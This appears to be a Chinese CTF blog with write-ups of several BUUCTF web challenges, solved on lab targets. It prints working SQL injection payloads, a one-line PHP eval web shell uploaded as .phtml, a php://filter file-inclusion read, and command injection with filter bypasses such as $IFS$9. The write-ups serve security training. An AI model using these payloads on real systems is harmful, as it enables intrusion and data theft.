<h2 id="极客大挑战-2019Knife"><a href="#极客大挑战-2019Knife" class="headerlink" title="极客大挑战-2019Knife"></a>极客大挑战-2019Knife</h2><p>点进去看，这……简单 getshell？</p>
<p>直接中国蚁剑动手</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Knife.png" class="">

<p>连接成功，直接在根目录文件夹里面找到 flag</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/flag.png" class="">


<h2 id="极客大挑战-2019-LoveSQL"><a href="#极客大挑战-2019-LoveSQL" class="headerlink" title="极客大挑战 2019 LoveSQL"></a>极客大挑战 2019 LoveSQL</h2><ul>
<li>进入界面，输入一个数字1，查看SQL语句</li>
</ul>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/wanneng.png" class="">

<ul>
<li>根据SQL语句的闭合，使用万能密码登录</li>
</ul>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql">admin<span class="token string">' or '</span><span class="token number">1</span><span class="token string">'=1'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/password.png" class="">

<p>但是再使用这个密码登录之后，发现还是同一个界面</p>
<p>使用联合注入，发现报错</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql">admin' <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span class="token comment">#</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/error.png" class="">

<p>最后判断得到字段数为3</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/chaxun.png" class="">

<p>发现2，3位置可被查询</p>
<blockquote>
<p>这里前面的username一定不能是admin，一开始用admin一直不行，后面看了WP才改成了1</p>
</blockquote>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span>' <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token comment">#</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/database.png" class="">

<p>发现数据库的名称为geek，开始进一步查询</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span><span class="token string">' union select 1,group_concat(table_name) where information_schema.tables where tables_schema='</span>geek'<span class="token punctuation">,</span><span class="token number">3</span><span class="token comment">#</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>结果得到报错</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql">You have an error <span class="token operator">in</span> your <span class="token keyword">SQL</span> syntax<span class="token punctuation">;</span> <span class="token keyword">check</span> the manual that corresponds <span class="token keyword">to</span> your MariaDB server version <span class="token keyword">for</span> the <span class="token keyword">right</span> syntax <span class="token keyword">to</span> <span class="token keyword">use</span> near <span class="token string">'3 %23'</span> <span class="token operator">and</span> password<span class="token operator">=</span><span class="token string">'1'</span>' at line <span class="token number">1</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>尝试放到3字段中</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span>' <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>group_concat<span class="token punctuation">(</span>table_name<span class="token punctuation">)</span> <span class="token keyword">from</span> information_schema<span class="token punctuation">.</span><span class="token keyword">tables</span> <span class="token keyword">where</span> table_schema<span class="token operator">=</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<p>再进一步爆破column名</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/baopo.png" class="">

<p>只有一个payload检索出flag</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span>' <span class="token keyword">union</span> <span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span>group_concat<span class="token punctuation">(</span>password<span class="token punctuation">)</span> <span class="token keyword">from</span> l0ve1ysq1<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>


<h2 id="极客大挑战-2019Secret-File"><a href="#极客大挑战-2019Secret-File" class="headerlink" title="极客大挑战-2019Secret-File"></a>极客大挑战-2019Secret-File</h2><p>靶场界面如图所示，看到这个题目加 index 的界面，感觉就是扫目录了。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/index.png" class="">

<p>用 Burpsuite 扫静态资源，查找到一个名叫 “&#x2F;Archive_room.php”的目录。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/lists.png" class="">

<p>输入后界面如图所示</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/secret.png" class="">

<p>点击无比诱人的 Secret，发现屁都没有。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/SecretFile_end.png" class="">

<p>它说我是不是没有看清，抓包试试，感觉中间丢了什么。果不其然，抓包后得到在跳转中，夹带了私货的 “action.php”，查看界面，哼哼，被我抓到了吧。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/action.png" class="">

<p>进入 &#x2F;secr3t.php，出来了一段 php 的代码，简单代码审计一下。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/SecretFile_flag.png" class="">

<ul>
<li>看到注释，说 flag 在 flag.php 里面，结果又被骗了………………</li>
</ul>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/flagno.png" class="">

<p>这里说我看不见它，我觉得是背景太黑了，调整试一试。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/color.png" class="">

<p>好吧，没什么用。还是回去，沉下心来代码审计。</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>html</span><span class="token punctuation">></span></span>  
 <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>title</span><span class="token punctuation">></span></span>secret<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>title</span><span class="token punctuation">></span></span>  
 <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>meta</span> <span class="token attr-name">charset</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>UTF-8<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>  
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>  
    <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
	<span class="token function">error_reporting</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
	<span class="token variable">$file</span><span class="token operator">=</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>  
    	<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">strstr</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"../"</span><span class="token punctuation">)</span><span class="token operator">||</span><span class="token class-name">stristr</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">"tp"</span><span class="token punctuation">)</span><span class="token operator">||</span><span class="token class-name">stristr</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"input"</span><span class="token punctuation">)</span><span class="token operator">||</span><span class="token class-name">stristr</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"data"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>  
        <span class="token keyword">echo</span> <span class="token string double-quoted-string">"Oh no!"</span><span class="token punctuation">;</span>  
        <span class="token keyword">exit</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  
    <span class="token punctuation">&#125;</span>  
    <span class="token keyword">include</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">//flag放在了flag.php里  </span>
<span class="token delimiter important">?></span></span>  
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>html</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>很显然，是获取 GET 请求的参数 File，File 当中不能由目录遍历的攻击，也不能出现 “tp” “input” “data”； 尝试一下 File &#x3D; flag.php；也失败了</p>
<p>猜测存在<strong>文件包含</strong>漏洞<br>php:&#x2F;&#x2F;filter 是一种元封装器， 设计用于数据流打开时的筛选过滤应用。<br>php 读取文件时是通过这样的方式的</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">php<span class="token punctuation">:</span><span class="token comment">//filter/read=convert.base64-encode/resource=flag.php</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>所以构造 payload </p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token operator">?</span>file<span class="token operator">=</span>php<span class="token punctuation">:</span><span class="token comment">//filter/convert.base64-encode/resource=flag.php</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/SecretFileGetFlag.png" class="">

<p>再将得到的答案进行 base64 解码，即可获得 flag</p>
<h2 id="极客大挑战-2019Upload"><a href="#极客大挑战-2019Upload" class="headerlink" title="极客大挑战-2019Upload"></a>极客大挑战-2019Upload</h2><h3 id="靶场部分"><a href="#靶场部分" class="headerlink" title="靶场部分"></a>靶场部分</h3><p>看名字就知道是文件上传了。题目界面如图所示</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Geek2019_Upload.png" class="">

<p>这背景看着就烦，先删了。</p>
<p>拿 Buprsuite 抓一下包，观察一下上传文件的请求。这里我上传的是 jpg 的文件，上传之后的界面如图所示</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/PicFailed.png" class="">

<p>不太懂，不是说上传 jpg 的吗…………为啥会这样。按照道理来说至少 jpeg&#x2F;jpg&#x2F;image 这种，起码能传上去阿……………………算了，毕竟是 CTF，直接传 php 好了。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/NoPhp.png" class="">

<p>呃，PHP 应该说是肯定会寄的，试试文件上传的一些普通攻击方式，尝试使用文件上传的方式 GetShell。</p>
<p>一句话木马。对应编辑文件 ———— shell.jpg</p>
<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span> <span class="token attr-name">language</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>php<span class="token punctuation">'</span></span><span class="token punctuation">></span></span><span class="token script"><span class="token language-javascript"><span class="token function">eval</span><span class="token punctuation">(</span>$_POST<span class="token punctuation">[</span><span class="token string">'cmd'</span><span class="token punctuation">]</span><span class="token punctuation">;</span></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>尝试上传失败，表明网页存在后端检测，添加 jpeg 图像头</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/succUpload.png" class="">

<p>再用 .phtml 的方式绕过</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/phtml.png" class="">

<p>猜测网站将上传的文件全部存在了 &#x2F;upload 目录下，直接访问 &#x2F;upload </p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/uploadFile.png" class="">


<p>找到我们的 shell.phtml，用蚁剑连。</p>
<pre class="line-numbers language-none"><code class="language-none">网站：http:&#x2F;&#x2F;a8f651b3-11d3-4223-be9a-0d6e367040e0.node4.buuoj.cn:81&#x2F;upload&#x2F;shell.phtml

密码 cmd<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>连接上之后 找出 flag</p>
<h3 id="源码部分"><a href="#源码部分" class="headerlink" title="源码部分"></a>源码部分</h3><p>我们现在解出题目了，回来看看源码，先说说本人在尝试的过程中遭遇的困境吧。</p>
<ul>
<li>在正常的渗透测试环境中，jpg 的文件是肯定可以上传的，而不是上传后出现 “Don’t lie to me”</li>
<li>在上传的过程中，尝试了上传 php,php2.php3 文件都失败了，怀疑上传文件中包含 php 就会被过滤。</li>
<li>修改 MIME 的时候，会回显错误：NOT IMAGE</li>
</ul>


<p>代码的第 53 行开始，进行过滤操作，对上传的文件进行限制。我们逐步解读一下。</p>
<blockquote>
<p>第 53 行<br>$file[“size”] &lt; 20480)  要求文件上传的内容小于 20kb</p>
<p>第 59 行<br>elseif (in_array($extension, $allowedExts)) 判断上传的文件的后缀是否是 “allowedExts” 里面的文件后缀名</p>
</blockquote>
<p>第 62 行</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">elseif (mb_strpos(file_get_contents($file["tmp_name"]), "&lt;?") !== FALSE)
不允许上传的文件中包含 `<span class="token php language-php"><span class="token delimiter important">&lt;?</span>`</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>第 65 行</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token keyword">elseif</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token variable">$image_type</span><span class="token punctuation">)</span>  非 image 后缀的上传是不允许的<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<hr>
<hr>
<h2 id="GXYCTF2019BabySQli"><a href="#GXYCTF2019BabySQli" class="headerlink" title="GXYCTF2019BabySQli"></a>GXYCTF2019BabySQli</h2><p>老规矩，先输入 <code>1&#39;</code> 查看SQL语句</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/try.png" class="">

<p>尝试万能密码，SQL语句闭合，但是无法进入</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span><span class="token string">' or '</span><span class="token number">1</span><span class="token string">'='</span><span class="token number">1</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/dont.png" class="">

<p>进行union的联合查询，发现当字段数为3的时候成功，但进入之后无法利用字段回显，懵逼了…………为什么会是wrong user呢……？</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/try.png" class="">

<p>f12查看源代码，发现有一段字母，意义不明，先拉出来看看吧。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/code.png" class="">

<p>尝试base32解密之后再base64解密。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/base64.png" class="">

<p>尝试输入admin，admin作为账号密码，显示<code>wrong pass</code>，那admin应该是username无疑了，尝试admin与’admin’。</p>
<p>那既然得到的报错是wrong user，那我们直接尝试在<code>1&#39; union select 1,2,3 #</code>的payload中将’1’修改为admin，返回报错。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/GXYCTF2019-BabySQli_error.png" class="">

<p>咦，这么看的话，第一个字段应该能够回显信息咯？尝试在第一个字段输入”dartabase()”，同样报错了。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/dont.png" class="">

<p>那说明………………应该尝试一下<code>&#39;admin&#39;</code>，在第一个字段输入’admin’，毕竟我们现在报错。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/wronguser.png" class="">

<p>尝试第二个字段中输入’admin’。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/wrongpass.png" class="">

<p>看来username这里已经搞定了，需要对password进行绕过了。毫无头绪如何绕过……</p>
<p>我们猜测search.php它的后端是怎么写的：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token variable">$name</span> <span class="token operator">=</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'name'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$password</span> <span class="token operator">=</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'pw'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$sql</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"select * from user where username = '"</span><span class="token operator">.</span><span class="token variable">$name</span><span class="token operator">.</span><span class="token string double-quoted-string">"'"</span><span class="token punctuation">;</span>   
<span class="token comment">// echo $sql;</span>
<span class="token variable">$result</span> <span class="token operator">=</span> <span class="token function">mysqli_query</span><span class="token punctuation">(</span><span class="token variable">$con</span><span class="token punctuation">,</span> <span class="token variable">$sql</span><span class="token punctuation">)</span><span class="token punctuation">;</span>      
<span class="token variable">$arr</span> <span class="token operator">=</span> <span class="token function">mysqli_fetch_row</span><span class="token punctuation">(</span><span class="token variable">$result</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment">// print_r($arr);</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$arr</span><span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token operator">==</span> <span class="token string double-quoted-string">"admin"</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$password</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token variable">$arr</span><span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
		<span class="token keyword">echo</span> <span class="token variable">$flag</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
			<span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"wrong pass!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
		<span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"wrong user!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	 <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<ul>
<li><p>利用联合查询的特点：<strong>在联合查询并不存在的数据时，联合查询就会构造一个虚拟的数据</strong>。</p>
<p>payload：</p>
</li>
</ul>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span><span class="token string">' union select 1,'</span>admin<span class="token string">','</span><span class="token number">202</span>cb962ac59075b964b07152d234b70' <span class="token comment">#</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>“202cb962ac59075b964b07152d234b70”为123的md5加密值，此题由于过滤了括号，所以不能用md5()函数。在密码处输入我们自定义的密码123，即可绕过检验，成功登陆admin账户</p>
<h2 id="GXYCTF2019-PingPingPing"><a href="#GXYCTF2019-PingPingPing" class="headerlink" title="GXYCTF2019-PingPingPing"></a>GXYCTF2019-PingPingPing</h2><p>打开靶场，界面如图所示</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/GXYCTF2019-PingPingPing.png" class="">

<p>结合题目名称来说，PingPingPing，加上看到的 ?ip&#x3D; 有点死亡 Ping 的感觉。<br>先尝试 Ping 自己，然后 Ping baidu.com，再 Ping Google.com，列表展示一下回显。</p>
<table>
<thead>
<tr>
<th>输入</th>
<th>回显</th>
</tr>
</thead>
<tbody><tr>
<td>?ip&#x3D;127.0.0.1</td>
<td>PING 127.0.0.1 (127.0.0.1): 56 data bytes</td>
</tr>
<tr>
<td>?ip&#x3D;baidu.com</td>
<td>PING baidu.com (220.181.38.251): 56 data bytes</td>
</tr>
<tr>
<td>?ip&#x3D;google.com</td>
<td>PING google.com (8.7.198.46): 56 data bytes</td>
</tr>
</tbody></table>
<p>当然，这里 Ping Google.com 肯定是被 DNS 劫持了，一看就是错误的 IP。</p>
<ul>
<li>没有后续的思路了，尝试用 Burpsuite 抓包试一试。</li>
</ul>
<p>并没有什么卯用</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/NoUse.png" class="">

<p>考虑到题目名叫 PingPingPing，尝试继续添加 &#x2F;?ip&#x3D;127.0.0.1，查看回显。</p>
<ul>
<li>哦嘿，有点东西</li>
</ul>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/fxck.png" class="">

<p>再加一个？达到 PingPingPing 的效果，可惜效果并不尽如人意，抓包，仔细分析一下 fxck 那张图的请求。</p>
<ul>
<li>好吧，还是没什么用………………</li>
</ul>
<p>！！！！！！！！！！！！柳暗花明又一村！！！！！！！！！！！！！</p>
<p>因为在输入两个 <code>/?ip=127.0.0.1</code> 之后，前端的回显是 <code>/?ip= 1fxck your symbol!</code><br>直接用这个参数，试一试通不通。Nice 起飞！</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Nice.png" class="">

<p>但是使用 <code>/?ip= fxck your space!</code> 时，却没有回显了</p>
<ul>
<li>换一种思路，重新回到界面，尝试命令执行攻击</li>
</ul>
<hr>
<h3 id="命令执行方式攻击"><a href="#命令执行方式攻击" class="headerlink" title="命令执行方式攻击"></a>命令执行方式攻击</h3><p>看到 <code>?ip=</code> 很容易想到命令执行注入，使用 <code>;</code> 或者 <code>|</code> 闭合上一条命令</p>
<p>初步的 payload</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;?ip&#x3D;;ls<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/ls.png" class="">

<p>看到了 flag.php 的文件，直接 cat 应该就可以了吧？</p>
<p>尝试 payload</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;?ip&#x3D;;cat flag.php<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>得到的回显还是 <code>/?ip= fxck your space!</code>，说明空格很可能是被过滤了，不可以输入到 ip 参数当中。</p>
<p>空格被过滤时使用 <code>$IFS$9</code> 绕过。</p>
<p>payload 构造如下</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;?ip&#x3D;;cat$IFS$9flag.php<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/GXYCTF2019-PingPingPing_Flag.png" class="">

<p>还是报错，说明关键字 flag 被过滤</p>
<p>尝试可不可以将此文件夹下的所有文件都 ls 出来，构造 payload</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;?ip&#x3D;;cat$IFS$9&#96;ls&#96;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>只获取到了 index.php 的内容，看到一系列的过滤规则。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Filter.png" class="">

<ul>
<li>静下心来，代码审计，实际上就是简单的进行了过滤。</li>
</ul>
<p>尝试绕过，先将 flag 中的 g 赋值给 变量 a，那么 flag 就变成了 <code>fla$a</code>，payload</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;?ip&#x3D;127.0.0.1;a&#x3D;g;cat$IFS$1fla$a.php<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>终于出来了，累 QAQ</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/GXYCTF2019-PingPingPing_GetFlag.png" class="">



<h2 id="HCTF-2018-admin"><a href="#HCTF-2018-admin" class="headerlink" title="HCTF 2018 admin"></a>HCTF 2018 admin</h2><p>打开网站，主界面如下图，在”hctf”有一处链接，好奇，点了进去，href是&#x2F;post</p>
<p>&#x2F;post有点像博客的感觉？不知道，查看login和register。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/main.png" class="">

<ul>
<li>源码中有一段注释</li>
</ul>
<pre class="line-numbers language-none"><code class="language-none">&lt;!-- you are not my admin --&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/admin.png" class="">

<ul>
<li><p>题目名为”admin”，尝试在register中注册admin，admin。提示</p>
<p><code>The username has been registered</code></p>
</li>
</ul>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/register.png" class="">

<p>猜测应该是访问控制，提权类的题目，或许也可以用SQL注入(?)</p>
<p>尝试了SQL注入，过不去，已知用户名为admin，对password进行爆破……没爆出来，抓包后也手足无措。尝试再注册一个账号吧，一直在外围进不去总不是什么办法。随意注册一个账号并登录。</p>


<p>看一看界面，非常敏感地抓到了救命稻草，<code>chang password</code>，抓包。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/change_password.png" class="">

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/change.png" class="">

<p>这里已经做好了通过remember_token和session替换的方式对admin进行密码修改，可是在登录的时候，发现输入admin，123(我之前设置的密码)，直接通过了…………虽然flag是拿到了，但是题目的原理还是没搞懂，深究一下。</p>
